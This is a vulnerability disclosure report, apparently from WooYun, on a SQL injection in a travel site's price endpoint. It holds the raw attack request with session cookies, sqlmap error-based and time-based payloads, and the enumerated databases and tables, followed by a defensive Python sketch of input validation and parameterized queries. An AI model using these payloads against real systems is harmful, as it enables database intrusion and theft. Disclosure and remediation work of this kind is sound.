WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
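2015-09-02: Details reported to the vendor; awaiting vendor handling
2015-09-02: Vendor confirmed; details disclosed to the vendor only
2015-09-12: Details disclosed to core white hats and relevant domain experts
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public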
The POST above was edited incorrectly, sorry.
POST /dujia/product/price HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.doyouhike.net:80/
Cookie: PHPSESSID=3s4c23cavdekl73caccl5tsn73; dyh_lastactivity=1441094989; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2259b0fe1b87c6586d1887a5231f7f7823%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22108.61.127.60%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1441093840%3B%7Df7258d5f059819ae0d4a3da2153cc48f; dyh_version=old; BAIDUID=B563E07E7FB4A8F497EC7BAC18231A40:FG=1; guid=a742-08e4-9593-4231; OAID=d42862cc581dffd429c54f3c67008240; u2=ed999103-87e3-434f-8936-1e2534f5dd4144C010
Host: www.doyouhike.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

days=NaN&endtime=e&id=81%20AND%203*2*1%3d6%20AND%20872%3d872&num=e&property=564&starttime=undefined
sqlmap identified the following injection point(s) with a total of 1323 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT 6314 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(6314=6314,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- iisg21=6 AND 872=872&num=e&property=564&starttime=undefined

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))MAGS)-- yype21=6 AND 872=872&num=e&property=564&starttime=undefined
---
web server operating system: Windows 7
back-end DBMS: MySQL 5.0

current database: 'ezaitu_dive_fin'

available databases [6]:
[*] ezaitu_dive_fin
[*] ezaitu_jhapi_dev
[*] ezaitu_race
[*] ezaitu_wiki
[*] ezaitu_yizhan
[*] information_schema

Database: ezaitu_dive_fin
[67 tables]
+------------------------------+
| ci_sessions                  |
| dili_attachments             |
| dili_backend_settings        |
| dili_cate_fields             |
| dili_cate_models             |
| dili_fieldtypes              |
| dili_menus                   |
| dili_model_fields            |
| dili_models                  |
| dili_plugins                 |
| dili_rights                  |
| dili_roles                   |
| dili_sessions                |
| dili_site_settings           |
| dili_u_access_rule           |
| dili_u_admins                |
| dili_u_authassignment        |
| dili_u_authitem              |
| dili_u_authitemchild         |
| dili_u_c_areas               |
| dili_u_c_article_categories  |
| dili_u_c_cities              |
| dili_u_c_countries           |
| dili_u_c_districts           |
| dili_u_c_im_categories       |
| dili_u_c_orders              |
| dili_u_c_position            |
| dili_u_c_product_categories  |
| dili_u_c_provinces           |
| dili_u_c_shops               |
| dili_u_groups                |
| dili_u_m_ads                 |
| dili_u_m_article_replies     |
| dili_u_m_articles            |
| dili_u_m_comments            |
| dili_u_m_currencies          |
| dili_u_m_discount            |
| dili_u_m_favorites           |
| dili_u_m_galleries           |
| dili_u_m_help_categories     |
| dili_u_m_helps               |
| dili_u_m_hotels              |
| dili_u_m_ims                 |
| dili_u_m_joins               |
| dili_u_m_logs                |
| dili_u_m_mailcfg             |
| dili_u_m_mails               |
| dili_u_m_mailsendlist        |
| dili_u_m_messages            |
| dili_u_m_navigators          |
| dili_u_m_order_logs          |
| dili_u_m_order_products      |
| dili_u_m_order_products_logs |
| dili_u_m_order_profiles      |
| dili_u_m_order_profiles_logs |
| dili_u_m_pages               |
| dili_u_m_product_auxiliary   |
| dili_u_m_product_properties  |
| dili_u_m_products            |
| dili_u_m_products_recommend  |
| dili_u_m_properties          |
| dili_u_m_property_models     |
| dili_u_m_tags                |
| dili_u_m_users               |
| dili_u_product_auxiliary     |
| dili_u_user_menus            |
| dili_validations             |
+------------------------------+
Parameter filtering
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-09-02 13:24
Confirmed; the parameter filtering was inadequate.
None yet
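
The fix named in this report is parameter filtering. The sketch below is an added example, not code from the site or from the report: it validates the integer-looking fields of the POST body shown above and passes them to the database only as bound parameters. The field types, the `price` table and its columns are assumptions, and `sqlite3` stands in for the MySQL back end.

```python
import sqlite3
from urllib.parse import parse_qs

# Assumption: these four fields of the page's POST body are unsigned integers.
INT_FIELDS = ("id", "property", "days", "num")
PAGE_BODY = ("days=NaN&endtime=e&id=81%20AND%203*2*1%3d6%20AND%20872%3d872"
             "&num=e&property=564&starttime=undefined")   # body quoted on the page
GOOD_BODY = "days=3&id=81&num=2&property=564"             # constructed sample


def validate(body):
    """Return (params, errors). Bad values are rejected, never 'cleaned up'."""
    raw = parse_qs(body, keep_blank_values=True)
    params, errors = {}, []
    for name in INT_FIELDS:
        values = raw.get(name, [])
        ok = (len(values) == 1 and values[0].isascii()
              and values[0].isdigit() and len(values[0]) <= 9)
        if ok:
            params[name] = int(values[0])
        else:
            errors.append(name)   # field names are safe to log for detection
    return params, errors


def make_db():
    # Constructed table and row (hypothetical schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE price "
               "(product_id INTEGER, property_id INTEGER, amount INTEGER)")
    db.execute("INSERT INTO price VALUES (81, 564, 1200)")
    return db


def lookup_price(db, body):
    params, errors = validate(body)
    if errors:
        raise ValueError("rejected fields: " + ", ".join(errors))
    # Placeholders keep request values out of the SQL text entirely.
    row = db.execute(
        "SELECT amount * ? * ? FROM price "
        "WHERE product_id = ? AND property_id = ?",
        (params["days"], params["num"], params["id"], params["property"]),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(lookup_price(make_db(), GOOD_BODY))
    print(validate(PAGE_BODY)[1])
```

Validation and binding are independent layers: the typed check rejects the request early and gives a loggable signal, while the placeholders ensure a value that slips through is still treated as data.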